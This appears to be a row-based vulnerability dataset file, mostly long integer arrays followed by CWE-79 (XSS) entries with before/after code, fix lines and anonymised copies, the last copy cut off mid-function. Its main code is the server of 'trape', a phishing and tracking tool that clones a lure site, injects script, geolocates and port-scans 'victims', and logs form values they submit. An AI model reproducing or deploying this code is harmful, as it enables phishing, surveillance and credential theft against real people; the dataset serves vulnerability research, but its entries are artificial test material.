146,
147,
148,
149,
170,
171,
172,
173,
174,
175,
176,
181,
182,
183,
184,
185,
218,
219,
220,
221,
222,
223,
224,
225,
226,
227,
228,
335,
344,
345,
346,
347,
348,
349,
359,
360,
361,
362,
363,
378,
379,
380,
381,
400,
401,
402,
403,
423,
424,
425,
426,
427,
428,
429,
430,
576,
577,
578,
579,
580,
581,
783,
784,
785,
786,
787,
788,
789,
790,
791,
900,
953,
993,
994,
995,
1006,
1007,
1008,
1009,
1010,
1029,
1030,
1031,
1032,
1033,
1034,
1098,
1099,
1100,
1101,
1147,
1148,
1149,
1150,
1151,
1152,
1153,
1183,
1184,
1185,
1186,
1187,
1188,
1189,
1190,
1191,
1192,
1193,
1247,
1248,
1249,
1250,
1251,
1252,
1303,
1407,
1408,
1409,
1410,
1466,
1467,
1468,
1469,
1470,
1471,
1472,
1473,
1539,
1556,
1557,
1558,
1656,
1657,
1658,
1659,
1660,
1661,
1754,
1755,
1756,
1816,
1817,
1818,
1819,
1820,
1833,
1834,
1835,
1836,
2163,
2164,
2165,
2166,
2167,
2220,
2221,
2222,
2240,
2241,
2242,
2243,
2244,
2319,
2320,
2321,
2322,
2323,
2324,
2430,
2431,
2432,
2450,
2451,
2452,
2453,
2517,
2518,
2519,
2520,
2596,
2597,
2598,
2637,
2638,
2639,
2640,
2782,
2783,
2784,
2819,
2820,
2821,
2822,
2823,
2824,
2825,
2826,
2827,
2828,
2829,
2830,
2831,
2832,
3142,
3143,
3144,
3145,
3174,
3175,
3176,
3177,
3178,
3179,
3180,
3181,
3182,
3183,
3184,
3185,
3186,
3296,
3315,
3340,
3341,
3342,
3343,
3344,
3430,
3431,
3432,
3433,
3434,
3457,
3479,
3480,
3481,
3482,
3483,
3484,
3485,
3514,
3522,
3523,
3524,
3525,
3526,
3527,
3528,
3529,
3912,
3913,
3914,
3915,
3916,
3945,
3956,
3970,
3971,
3972,
3973,
3974,
3975,
4037,
4038,
4039,
4170,
4171,
4172,
4329,
4330,
4331,
4332,
4333,
4365,
4366,
4367,
4368,
4560,
4580,
4581,
4582,
4583,
4584,
4696,
4697,
4698,
4699,
4700,
4740,
4741,
4742,
4882,
4918,
4919,
4920,
4921,
4922,
4923,
4943,
4944,
4945,
4946,
4947,
4998,
4999,
5000,
5001,
234,
235,
236,
240,
241,
242,
243,
244,
277,
278,
279,
280,
281,
282,
283,
284,
285
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
24,
40,
42,
45,
49,
51,
68,
69,
81,
86,
88,
92,
94,
109,
126,
128,
133,
135,
137,
138,
139,
141,
142,
147,
156,
157,
161,
162,
168,
169,
174,
179,
180,
190,
191,
192,
193,
194,
195,
200,
210,
212,
213,
214,
215,
216,
217,
230,
233,
239,
246,
247,
248,
249,
250,
258,
261,
263,
264,
276,
282,
303,
306,
312,
330,
332,
333,
337,
338,
339,
341,
342,
352,
357,
358,
376,
377,
397,
398,
405,
419,
420,
421,
423,
433,
441,
443,
444,
446,
447,
452,
453,
455,
456,
458,
463,
464,
466,
467,
474,
475,
481,
482,
483,
487,
488,
490,
494,
495,
499,
505,
514,
517,
522,
524,
528,
530,
531,
540,
564,
566,
567,
572,
573,
583,
596,
599,
607,
608,
611,
618,
620,
630,
632,
633,
636,
641,
643,
647,
654,
661,
662,
665,
673,
674,
675,
676,
677,
678,
679,
682,
685,
693,
694,
703,
704,
712,
713,
722,
733,
749,
751,
752,
755,
763,
766,
768,
778,
780,
781,
791,
793,
806,
809,
810,
811,
812,
813,
815,
817,
837,
839,
840,
843,
851,
854,
856,
866,
868,
869,
872,
879,
880,
881,
884,
886,
896,
898,
899,
907,
908,
909,
925,
928,
930,
931,
942,
944,
951,
952,
957,
958,
991,
992,
1003,
1004,
1016,
1020,
1022,
1027,
1028,
1036,
1038,
1039,
1040,
1041,
1050,
1056,
1062,
1064,
1077,
1079,
1086,
1087,
1094,
1096,
1097,
1103,
1105,
1106,
1107,
1122,
1126,
1127,
1131,
1139,
1140,
1142,
1144,
1145,
1152,
1161,
1166,
1178,
1180,
1181,
1187,
1191,
1195,
1204,
1205,
1216,
1219,
1237,
1238,
1245,
1246,
1254,
1266,
1268,
1282,
1283,
1299,
1301,
1302,
1305,
1310,
1312,
1320,
1325,
1332,
1334,
1335,
1338,
1349,
1352,
1367,
1369,
1370,
1373,
1381,
1382,
1383,
1384,
1385,
1387,
1391,
1401,
1403,
1404,
1412,
1413,
1415,
1416,
1417,
1422,
1427,
1428,
1430,
1432,
1433,
1441,
1442,
1450,
1458,
1462,
1463,
1475,
1488,
1494,
1501,
1502,
1504,
1508,
1509,
1510,
1515,
1523,
1524,
1531,
1533,
1535,
1536,
1541,
1542,
1545,
1549,
1552,
1553,
1561,
1563,
1571,
1575,
1580,
1592,
1593,
1596,
1597,
1598,
1609,
1610,
1611,
1639,
1641,
1643,
1652,
1653,
1663,
1664,
1666,
1668,
1669,
1690,
1691,
1692,
1703,
1715,
1738,
1745,
1750,
1751,
1759,
1760,
1762,
1768,
1772,
1776,
1780,
1781,
1805,
1812,
1813,
1823,
1827,
1828,
1849,
1860,
1864,
1865,
1869,
1893,
1918,
1934,
1960,
1961,
1972,
1986,
1988,
1993,
1996,
2016,
2028,
2031,
2061,
2068,
2083,
2104,
2105,
2120,
2121,
2125,
2129,
2141,
2144,
2145,
2146,
2147,
2148,
2149,
2150,
2151,
2152,
2153,
2154,
2155,
2156,
2157,
2158,
2159,
2160,
2161,
2162,
2218,
2219,
2236,
2237,
2246,
2248,
2249,
2266,
2267,
2277,
2290,
2315,
2316,
2338,
2339,
2340,
2345,
2349,
2350,
2351,
2373,
2382,
2389,
2390,
2395,
2397,
2399,
2402,
2407,
2419,
2426,
2427,
2438,
2439,
2443,
2444,
2446,
2447,
2455,
2458,
2472,
2473,
2474,
2480,
2481,
2484,
2497,
2504,
2505,
2511,
2513,
2514,
2522,
2527,
2529,
2530,
2531,
2532,
2538,
2541,
2544,
2545,
2549,
2553,
2563,
2572,
2582,
2590,
2592,
2593,
2600,
2608,
2613,
2618,
2620,
2623,
2625,
2627,
2629,
2631,
2633,
2634,
2642,
2646,
2647,
2648,
2651,
2653,
2654,
2655,
2660,
2661,
2662,
2673,
2676,
2680,
2681,
2683,
2691,
2693,
2705,
2706,
2707,
2709,
2720,
2722,
2727,
2729,
2730,
2732,
2750,
2763,
2765,
2777,
2778,
2796,
2798,
2813,
2814,
2822,
2835,
2862,
2865,
2866,
2871,
2878,
2890,
2891,
2914,
2916,
2939,
2955,
2974,
2987,
3009,
3018,
3041,
3042,
3043,
3051,
3065,
3090,
3132,
3139,
3140,
3147,
3148,
3150,
3156,
3164,
3170,
3171,
3177,
3183,
3188,
3197,
3198,
3203,
3208,
3211,
3212,
3216,
3225,
3228,
3233,
3236,
3241,
3242,
3245,
3246,
3256,
3257,
3268,
3269,
3273,
3277,
3285,
3291,
3293,
3294,
3303,
3312,
3313,
3317,
3321,
3323,
3326,
3330,
3336,
3337,
3346,
3357,
3360,
3362,
3366,
3367,
3376,
3378,
3381,
3384,
3385,
3391,
3407,
3409,
3414,
3426,
3427,
3436,
3439,
3448,
3450,
3453,
3454,
3459,
3462,
3464,
3465,
3467,
3473,
3477,
3478,
3488,
3489,
3490,
3498,
3510,
3511,
3512,
3513,
3518,
3519,
3531,
3536,
3537,
3538,
3561,
3566,
3584,
3587,
3588,
3592,
3596,
3598,
3599,
3610,
3611,
3656,
3657,
3661,
3716,
3717,
3774,
3775,
3777,
3796,
3800,
3813,
3819,
3825,
3826,
3833,
3845,
3846,
3848,
3851,
3859,
3860,
3861,
3864,
3865,
3867,
3868,
3878,
3882,
3883,
3884,
3896,
3906,
3909,
3910,
3918,
3920,
3938,
3939,
3940,
3941,
3942,
3943,
3949,
3950,
3951,
3952,
3953,
3954,
3961,
3964,
3965,
3966,
3967,
3973,
3979,
3980,
3995,
3996,
3997,
3998,
3999,
4006,
4012,
4013,
4014,
4019,
4025,
4027,
4028,
4031,
4033,
4034,
4042,
4054,
4056,
4064,
4095,
4099,
4100,
4101,
4104,
4105,
4109,
4115,
4116,
4128,
4141,
4142,
4143,
4146,
4158,
4160,
4166,
4167,
4174,
4178,
4189,
4199,
4203,
4205,
4214,
4218,
4232,
4233,
4238,
4242,
4261,
4289,
4293,
4294,
4296,
4302,
4316,
4321,
4325,
4326,
4343,
4353,
4359,
4361,
4362,
4370,
4373,
4380,
4381,
4392,
4393,
4404,
4405,
4417,
4420,
4421,
4422,
4423,
4424,
4425,
4437,
4438,
4455,
4456,
4457,
4458,
4465,
4469,
4470,
4477,
4492,
4498,
4499,
4500,
4501,
4505,
4510,
4524,
4527,
4528,
4529,
4530,
4531,
4532,
4534,
4542,
4550,
4551,
4556,
4557,
4569,
4577,
4578,
4588,
4593,
4600,
4605,
4606,
4616,
4618,
4623,
4627,
4628,
4631,
4632,
4653,
4654,
4655,
4656,
4662,
4673,
4674,
4675,
4676,
4677,
4678,
4679,
4680,
4690,
4691,
4693,
4694,
4704,
4712,
4716,
4735,
4737,
4738,
4745,
4747,
4749,
4754,
4761,
4763,
4764,
4772,
4776,
4780,
4781,
4782,
4787,
4794,
4795,
4806,
4816,
4817,
4820,
4821,
4828,
4829,
4833,
4843,
4844,
4854,
4855,
4856,
4868,
4870,
4872,
4878,
4879,
4884,
4887,
4888,
4893,
4897,
4898,
4901,
4912,
4914,
4915,
4925,
4928,
4941,
4942,
4953,
4965,
4968,
4974,
4982,
4992,
4994,
4995,
5003,
5011,
5017,
5026,
20,
21,
22,
23,
144,
145,
146,
147,
148,
149,
150,
171,
172,
173,
174,
175,
176,
177,
182,
183,
184,
185,
186,
219,
220,
221,
222,
223,
224,
225,
226,
227,
228,
229,
336,
345,
346,
347,
348,
349,
350,
360,
361,
362,
363,
364,
379,
380,
381,
382,
401,
402,
403,
404,
424,
425,
426,
427,
428,
429,
430,
431,
577,
578,
579,
580,
581,
582,
784,
785,
786,
787,
788,
789,
790,
791,
792,
901,
954,
994,
995,
996,
1007,
1008,
1009,
1010,
1011,
1030,
1031,
1032,
1033,
1034,
1035,
1099,
1100,
1101,
1102,
1148,
1149,
1150,
1151,
1152,
1153,
1154,
1184,
1185,
1186,
1187,
1188,
1189,
1190,
1191,
1192,
1193,
1194,
1248,
1249,
1250,
1251,
1252,
1253,
1304,
1408,
1409,
1410,
1411,
1467,
1468,
1469,
1470,
1471,
1472,
1473,
1474,
1540,
1557,
1558,
1559,
1657,
1658,
1659,
1660,
1661,
1662,
1755,
1756,
1757,
1817,
1818,
1819,
1820,
1821,
1834,
1835,
1836,
1837,
2164,
2165,
2166,
2167,
2168,
2221,
2222,
2223,
2241,
2242,
2243,
2244,
2245,
2320,
2321,
2322,
2323,
2324,
2325,
2431,
2432,
2433,
2451,
2452,
2453,
2454,
2518,
2519,
2520,
2521,
2597,
2598,
2599,
2638,
2639,
2640,
2641,
2783,
2784,
2785,
2820,
2821,
2822,
2823,
2824,
2825,
2826,
2827,
2828,
2829,
2830,
2831,
2832,
2833,
3143,
3144,
3145,
3146,
3175,
3176,
3177,
3178,
3179,
3180,
3181,
3182,
3183,
3184,
3185,
3186,
3187,
3297,
3316,
3341,
3342,
3343,
3344,
3345,
3431,
3432,
3433,
3434,
3435,
3458,
3480,
3481,
3482,
3483,
3484,
3485,
3486,
3515,
3523,
3524,
3525,
3526,
3527,
3528,
3529,
3530,
3913,
3914,
3915,
3916,
3917,
3946,
3957,
3971,
3972,
3973,
3974,
3975,
3976,
4038,
4039,
4040,
4171,
4172,
4173,
4330,
4331,
4332,
4333,
4334,
4366,
4367,
4368,
4369,
4561,
4581,
4582,
4583,
4584,
4585,
4697,
4698,
4699,
4700,
4701,
4741,
4742,
4743,
4883,
4919,
4920,
4921,
4922,
4923,
4924,
4944,
4945,
4946,
4947,
4948,
4999,
5000,
5001,
5002,
235,
236,
237,
241,
242,
243,
244,
245,
278,
279,
280,
281,
282,
283,
284,
285,
286
] |
1CWE-79
| import orjson
from tests.views.message.utils import post_and_get_response
def test_message_nested_sync_input(client):
data = {"dictionary": {"name": "test"}}
action_queue = [
{"payload": {"name": "dictionary.name", "value": "test1"}, "type": "syncInput",}
]
response = post_and_get_response(
client,
url="/message/tests.views.fake_components.FakeComponent",
data=data,
action_queue=action_queue,
)
assert not response["errors"]
assert response["data"].get("dictionary") == {"name": "test1"}
| from tests.views.message.utils import post_and_get_response
def test_message_nested_sync_input(client):
data = {"dictionary": {"name": "test"}}
action_queue = [
{"payload": {"name": "dictionary.name", "value": "test1"}, "type": "syncInput",}
]
response = post_and_get_response(
client,
url="/message/tests.views.fake_components.FakeComponent",
data=data,
action_queue=action_queue,
)
assert not response["errors"]
assert response["data"].get("dictionary") == {"name": "test1"}
| xss | {
"code": [
"import orjson"
],
"line_no": [
1
]
} | {
"code": [],
"line_no": []
} | import orjson
from tests.views.message.utils import post_and_get_response
def FUNC_0(VAR_0):
VAR_1 = {"dictionary": {"name": "test"}}
VAR_2 = [
{"payload": {"name": "dictionary.name", "value": "test1"}, "type": "syncInput",}
]
VAR_3 = post_and_get_response(
VAR_0,
url="/message/tests.views.fake_components.FakeComponent",
VAR_1=data,
VAR_2=action_queue,
)
assert not VAR_3["errors"]
assert VAR_3["data"].get("dictionary") == {"name": "test1"}
| from tests.views.message.utils import post_and_get_response
def FUNC_0(VAR_0):
VAR_1 = {"dictionary": {"name": "test"}}
VAR_2 = [
{"payload": {"name": "dictionary.name", "value": "test1"}, "type": "syncInput",}
]
VAR_3 = post_and_get_response(
VAR_0,
url="/message/tests.views.fake_components.FakeComponent",
VAR_1=data,
VAR_2=action_queue,
)
assert not VAR_3["errors"]
assert VAR_3["data"].get("dictionary") == {"name": "test1"}
| [
2,
4,
5,
17,
20
] | [
2,
3,
15,
18
] |
1CWE-79
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
#**
#
#########
# trape #
#########
#
# trape depends of this file
# For full copyright information this visit: https://github.com/boxug/trape
#
# Copyright 2017 by boxug / <hey@boxug.com>
#**
import time
import urllib2
from flask import Flask, render_template, session, request, json
from core.victim_objects import *
import core.stats
from core.utils import utils
from core.db import Database
# Main parts, to generate relationships among others
trape = core.stats.trape
app = core.stats.app
# call database
db = Database()
class victim_server(object):
@app.route("/" + trape.victim_path)
def homeVictim():
opener = urllib2.build_opener()
headers = victim_headers()
opener.addheaders = headers
html = victim_inject_code(opener.open(trape.url_to_clone).read(), 'lure')
return html
@app.route("/register", methods=["POST"])
def register():
vId = request.form['vId']
if vId == '':
vId = utils.generateToken(5)
victimConnect = victim(vId, request.environ['REMOTE_ADDR'], request.user_agent.platform, request.user_agent.browser, request.user_agent.version, utils.portScanner(request.environ['REMOTE_ADDR']), request.form['cpu'], time.strftime("%Y-%m-%d - %H:%M:%S"))
victimGeo = victim_geo(vId, 'city', request.form['countryCode'], request.form['country'], request.form['query'], request.form['lat'], request.form['lon'], request.form['org'], request.form['region'], request.form['regionName'], request.form['timezone'], request.form['zip'], request.form['isp'], str(request.user_agent))
utils.Go(utils.Color['white'] + "[" + utils.Color['blueBold'] + "*" + utils.Color['white'] + "]" + " A victim has been connected from " + utils.Color['blue'] + victimGeo.ip + utils.Color['white'] + ' with the following identifier: ' + utils.Color['green'] + vId + utils.Color['white'])
cant = int(db.sentences_victim('count_times', vId, 3, 0))
db.sentences_victim('insert_click', [vId, trape.url_to_clone, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
db.sentences_victim('delete_networks', [vId], 2)
if cant > 0:
utils.Go(utils.Color['white'] + "[" + utils.Color['blueBold'] + "*" + utils.Color['white'] + "]" + " " + "It\'s his " + str(cant + 1) + " time")
db.sentences_victim('update_victim', [victimConnect, vId, time.time()], 2)
db.sentences_victim('update_victim_geo', [victimGeo, vId], 2)
else:
utils.Go(utils.Color['white'] + "[" + utils.Color['blueBold'] + "*" + utils.Color['white'] + "]" + " " + "It\'s his first time")
db.sentences_victim('insert_victim', [victimConnect, vId, time.time()], 2)
db.sentences_victim('insert_victim_geo', [victimGeo, vId], 2)
return json.dumps({'status' : 'OK', 'vId' : vId});
@app.route("/nr", methods=["POST"])
def networkRegister():
vId = request.form['vId']
vIp = request.form['ip']
vnetwork = request.form['red']
if vId == '':
vId = utils.generateToken(5)
utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] + "+" + utils.Color['white'] + "]" + utils.Color['whiteBold'] + " " + vnetwork + utils.Color['white'] + " session detected from " + utils.Color['blue'] + vIp + utils.Color['white'] + ' ' + "with ID: " + utils.Color['green'] + vId + utils.Color['white'])
cant = int(db.sentences_victim('count_victim_network', [vId, vnetwork], 3, 0))
if cant > 0:
db.sentences_victim('update_network', [vId, vnetwork, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
else:
db.sentences_victim('insert_networks', [vId, vIp, request.environ['REMOTE_ADDR'], vnetwork, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
return json.dumps({'status' : 'OK', 'vId' : vId});
@app.route("/redv")
def redirectVictim():
url = request.args.get('url')
opener = urllib2.build_opener()
headers = victim_headers()
opener.addheaders = headers
html = victim_inject_code(opener.open(url).read(), 'vscript')
return html
@app.route("/regv", methods=["POST"])
def registerRequest():
vrequest = victim_request(request.form['vId'], request.form['site'], request.form['fid'], request.form['name'], request.form['value'], request.form['sId'])
db.sentences_victim('insert_requests', [vrequest, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] + "=" + utils.Color['white'] + "]" + " " + 'Receiving data from: ' + utils.Color['green'] + vrequest.id + utils.Color['white'] + ' ' + 'on' + ' ' + utils.Color['blue'] + vrequest.site + utils.Color['white'] + '\t\n' + vrequest.fid + '\t' + vrequest.name + ':\t' + vrequest.value)
return json.dumps({'status' : 'OK', 'vId' : vrequest.id});
@app.route("/tping", methods=["POST"])
def receivePing():
vrequest = request.form['id']
db.sentences_victim('report_online', [vrequest])
return json.dumps({'status' : 'OK', 'vId' : vrequest});
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
#**
#
#########
# trape #
#########
#
# trape depends of this file
# For full copyright information this visit: https://github.com/boxug/trape
#
# Copyright 2017 by boxug / <hey@boxug.com>
#**
import time
import urllib2
from flask import Flask, render_template, session, request, json
from core.victim_objects import *
import core.stats
from core.utils import utils
from core.db import Database
# Main parts, to generate relationships among others
trape = core.stats.trape
app = core.stats.app
# call database
db = Database()
class victim_server(object):
@app.route("/" + trape.victim_path)
def homeVictim():
opener = urllib2.build_opener()
headers = victim_headers()
opener.addheaders = headers
html = victim_inject_code(opener.open(trape.url_to_clone).read(), 'lure')
return html
@app.route("/register", methods=["POST"])
def register():
vId = request.form['vId']
if vId == '':
vId = utils.generateToken(5)
victimConnect = victim(vId, request.environ['REMOTE_ADDR'], request.user_agent.platform, request.user_agent.browser, request.user_agent.version, utils.portScanner(request.environ['REMOTE_ADDR']), request.form['cpu'], time.strftime("%Y-%m-%d - %H:%M:%S"))
victimGeo = victim_geo(vId, 'city', request.form['countryCode'], request.form['country'], request.form['query'], request.form['lat'], request.form['lon'], request.form['org'], request.form['region'], request.form['regionName'], request.form['timezone'], request.form['zip'], request.form['isp'], str(request.user_agent))
utils.Go(utils.Color['white'] + "[" + utils.Color['blueBold'] + "*" + utils.Color['white'] + "]" + " A victim has been connected from " + utils.Color['blue'] + victimGeo.ip + utils.Color['white'] + ' with the following identifier: ' + utils.Color['green'] + vId + utils.Color['white'])
cant = int(db.sentences_victim('count_times', vId, 3, 0))
db.sentences_victim('insert_click', [vId, trape.url_to_clone, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
db.sentences_victim('delete_networks', [vId], 2)
if cant > 0:
utils.Go(utils.Color['white'] + "[" + utils.Color['blueBold'] + "*" + utils.Color['white'] + "]" + " " + "It\'s his " + str(cant + 1) + " time")
db.sentences_victim('update_victim', [victimConnect, vId, time.time()], 2)
db.sentences_victim('update_victim_geo', [victimGeo, vId], 2)
else:
utils.Go(utils.Color['white'] + "[" + utils.Color['blueBold'] + "*" + utils.Color['white'] + "]" + " " + "It\'s his first time")
db.sentences_victim('insert_victim', [victimConnect, vId, time.time()], 2)
db.sentences_victim('insert_victim_geo', [victimGeo, vId], 2)
return json.dumps({'status' : 'OK', 'vId' : vId});
@app.route("/nr", methods=["POST"])
def networkRegister():
vId = request.form['vId']
vIp = request.form['ip']
vnetwork = request.form['red']
if vId == '':
vId = utils.generateToken(5)
utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] + "+" + utils.Color['white'] + "]" + utils.Color['whiteBold'] + " " + vnetwork + utils.Color['white'] + " session detected from " + utils.Color['blue'] + vIp + utils.Color['white'] + ' ' + "with ID: " + utils.Color['green'] + vId + utils.Color['white'])
cant = int(db.sentences_victim('count_victim_network', [vId, vnetwork], 3, 0))
if cant > 0:
db.sentences_victim('update_network', [vId, vnetwork, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
else:
db.sentences_victim('insert_networks', [vId, vIp, request.environ['REMOTE_ADDR'], vnetwork, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
return json.dumps({'status' : 'OK', 'vId' : vId});
@app.route("/redv")
def redirectVictim():
url = request.args.get('url')
opener = urllib2.build_opener()
headers = victim_headers()
opener.addheaders = headers
html = victim_inject_code(opener.open(url).read(), 'vscript')
return html
@app.route("/regv", methods=["POST"])
def registerRequest():
vrequest = victim_request(request.form['vId'], request.form['site'], request.form['fid'], request.form['name'], request.form['value'], request.form['sId'])
db.sentences_victim('insert_requests', [vrequest, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] + "=" + utils.Color['white'] + "]" + " " + 'Receiving data from: ' + utils.Color['green'] + vrequest.id + utils.Color['white'] + ' ' + 'on' + ' ' + utils.Color['blue'] + vrequest.site + utils.Color['white'] + '\t\n' + vrequest.fid + '\t' + vrequest.name + ':\t' + vrequest.value)
return json.dumps({'status' : 'OK', 'vId' : vrequest.id});
@app.route("/tping", methods=["POST"])
def receivePing():
vrequest = request.form['id']
db.sentences_victim('report_online', [vrequest], 2)
return json.dumps({'status' : 'OK', 'vId' : vrequest});
| xss | {
"code": [
" db.sentences_victim('report_online', [vrequest])"
],
"line_no": [
100
]
} | {
"code": [
" db.sentences_victim('report_online', [vrequest], 2)"
],
"line_no": [
100
]
} |
import time
import .urllib2
from flask import Flask, render_template, session, request, json
from core.victim_objects import *
import core.stats
from core.utils import utils
from core.db import Database
VAR_0 = core.stats.trape
VAR_1 = core.stats.app
VAR_2 = Database()
class CLASS_0(object):
@VAR_1.route("/" + VAR_0.victim_path)
def FUNC_0():
VAR_3 = urllib2.build_opener()
VAR_4 = victim_headers()
VAR_3.addheaders = VAR_4
VAR_5 = victim_inject_code(VAR_3.open(VAR_0.url_to_clone).read(), 'lure')
return VAR_5
@VAR_1.route("/register", methods=["POST"])
def FUNC_1():
VAR_6 = request.form['vId']
if VAR_6 == '':
VAR_6 = utils.generateToken(5)
VAR_7 = victim(VAR_6, request.environ['REMOTE_ADDR'], request.user_agent.platform, request.user_agent.browser, request.user_agent.version, utils.portScanner(request.environ['REMOTE_ADDR']), request.form['cpu'], time.strftime("%Y-%m-%d - %H:%M:%S"))
VAR_8 = victim_geo(VAR_6, 'city', request.form['countryCode'], request.form['country'], request.form['query'], request.form['lat'], request.form['lon'], request.form['org'], request.form['region'], request.form['regionName'], request.form['timezone'], request.form['zip'], request.form['isp'], str(request.user_agent))
utils.Go(utils.Color['white'] + "[" + utils.Color['blueBold'] + "*" + utils.Color['white'] + "]" + " A victim has been connected from " + utils.Color['blue'] + VAR_8.ip + utils.Color['white'] + ' with the following identifier: ' + utils.Color['green'] + VAR_6 + utils.Color['white'])
VAR_9 = int(VAR_2.sentences_victim('count_times', VAR_6, 3, 0))
VAR_2.sentences_victim('insert_click', [VAR_6, VAR_0.url_to_clone, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
VAR_2.sentences_victim('delete_networks', [VAR_6], 2)
if VAR_9 > 0:
utils.Go(utils.Color['white'] + "[" + utils.Color['blueBold'] + "*" + utils.Color['white'] + "]" + " " + "It\'s his " + str(VAR_9 + 1) + " time")
VAR_2.sentences_victim('update_victim', [VAR_7, VAR_6, time.time()], 2)
VAR_2.sentences_victim('update_victim_geo', [VAR_8, VAR_6], 2)
else:
utils.Go(utils.Color['white'] + "[" + utils.Color['blueBold'] + "*" + utils.Color['white'] + "]" + " " + "It\'s his first time")
VAR_2.sentences_victim('insert_victim', [VAR_7, VAR_6, time.time()], 2)
VAR_2.sentences_victim('insert_victim_geo', [VAR_8, VAR_6], 2)
return json.dumps({'status' : 'OK', 'vId' : VAR_6});
@VAR_1.route("/nr", methods=["POST"])
def FUNC_2():
VAR_6 = request.form['vId']
VAR_10 = request.form['ip']
VAR_11 = request.form['red']
if VAR_6 == '':
VAR_6 = utils.generateToken(5)
utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] + "+" + utils.Color['white'] + "]" + utils.Color['whiteBold'] + " " + VAR_11 + utils.Color['white'] + " session detected from " + utils.Color['blue'] + VAR_10 + utils.Color['white'] + ' ' + "with ID: " + utils.Color['green'] + VAR_6 + utils.Color['white'])
VAR_9 = int(VAR_2.sentences_victim('count_victim_network', [VAR_6, VAR_11], 3, 0))
if VAR_9 > 0:
VAR_2.sentences_victim('update_network', [VAR_6, VAR_11, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
else:
VAR_2.sentences_victim('insert_networks', [VAR_6, VAR_10, request.environ['REMOTE_ADDR'], VAR_11, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
return json.dumps({'status' : 'OK', 'vId' : VAR_6});
@VAR_1.route("/redv")
def FUNC_3():
VAR_12 = request.args.get('url')
VAR_3 = urllib2.build_opener()
VAR_4 = victim_headers()
VAR_3.addheaders = VAR_4
VAR_5 = victim_inject_code(VAR_3.open(VAR_12).read(), 'vscript')
return VAR_5
@VAR_1.route("/regv", methods=["POST"])
def FUNC_4():
VAR_13 = victim_request(request.form['vId'], request.form['site'], request.form['fid'], request.form['name'], request.form['value'], request.form['sId'])
VAR_2.sentences_victim('insert_requests', [VAR_13, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] + "=" + utils.Color['white'] + "]" + " " + 'Receiving data from: ' + utils.Color['green'] + VAR_13.id + utils.Color['white'] + ' ' + 'on' + ' ' + utils.Color['blue'] + VAR_13.site + utils.Color['white'] + '\t\n' + VAR_13.fid + '\t' + VAR_13.name + ':\t' + VAR_13.value)
return json.dumps({'status' : 'OK', 'vId' : VAR_13.id});
@VAR_1.route("/tping", methods=["POST"])
def FUNC_5():
VAR_13 = request.form['id']
VAR_2.sentences_victim('report_online', [VAR_13])
return json.dumps({'status' : 'OK', 'vId' : VAR_13});
|
import time
import .urllib2
from flask import Flask, render_template, session, request, json
from core.victim_objects import *
import core.stats
from core.utils import utils
from core.db import Database
VAR_0 = core.stats.trape
VAR_1 = core.stats.app
VAR_2 = Database()
class CLASS_0(object):
@VAR_1.route("/" + VAR_0.victim_path)
def FUNC_0():
VAR_3 = urllib2.build_opener()
VAR_4 = victim_headers()
VAR_3.addheaders = VAR_4
VAR_5 = victim_inject_code(VAR_3.open(VAR_0.url_to_clone).read(), 'lure')
return VAR_5
@VAR_1.route("/register", methods=["POST"])
def FUNC_1():
VAR_6 = request.form['vId']
if VAR_6 == '':
VAR_6 = utils.generateToken(5)
VAR_7 = victim(VAR_6, request.environ['REMOTE_ADDR'], request.user_agent.platform, request.user_agent.browser, request.user_agent.version, utils.portScanner(request.environ['REMOTE_ADDR']), request.form['cpu'], time.strftime("%Y-%m-%d - %H:%M:%S"))
VAR_8 = victim_geo(VAR_6, 'city', request.form['countryCode'], request.form['country'], request.form['query'], request.form['lat'], request.form['lon'], request.form['org'], request.form['region'], request.form['regionName'], request.form['timezone'], request.form['zip'], request.form['isp'], str(request.user_agent))
utils.Go(utils.Color['white'] + "[" + utils.Color['blueBold'] + "*" + utils.Color['white'] + "]" + " A victim has been connected from " + utils.Color['blue'] + VAR_8.ip + utils.Color['white'] + ' with the following identifier: ' + utils.Color['green'] + VAR_6 + utils.Color['white'])
VAR_9 = int(VAR_2.sentences_victim('count_times', VAR_6, 3, 0))
VAR_2.sentences_victim('insert_click', [VAR_6, VAR_0.url_to_clone, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
VAR_2.sentences_victim('delete_networks', [VAR_6], 2)
if VAR_9 > 0:
utils.Go(utils.Color['white'] + "[" + utils.Color['blueBold'] + "*" + utils.Color['white'] + "]" + " " + "It\'s his " + str(VAR_9 + 1) + " time")
VAR_2.sentences_victim('update_victim', [VAR_7, VAR_6, time.time()], 2)
VAR_2.sentences_victim('update_victim_geo', [VAR_8, VAR_6], 2)
else:
utils.Go(utils.Color['white'] + "[" + utils.Color['blueBold'] + "*" + utils.Color['white'] + "]" + " " + "It\'s his first time")
VAR_2.sentences_victim('insert_victim', [VAR_7, VAR_6, time.time()], 2)
VAR_2.sentences_victim('insert_victim_geo', [VAR_8, VAR_6], 2)
return json.dumps({'status' : 'OK', 'vId' : VAR_6});
@VAR_1.route("/nr", methods=["POST"])
def FUNC_2():
VAR_6 = request.form['vId']
VAR_10 = request.form['ip']
VAR_11 = request.form['red']
if VAR_6 == '':
VAR_6 = utils.generateToken(5)
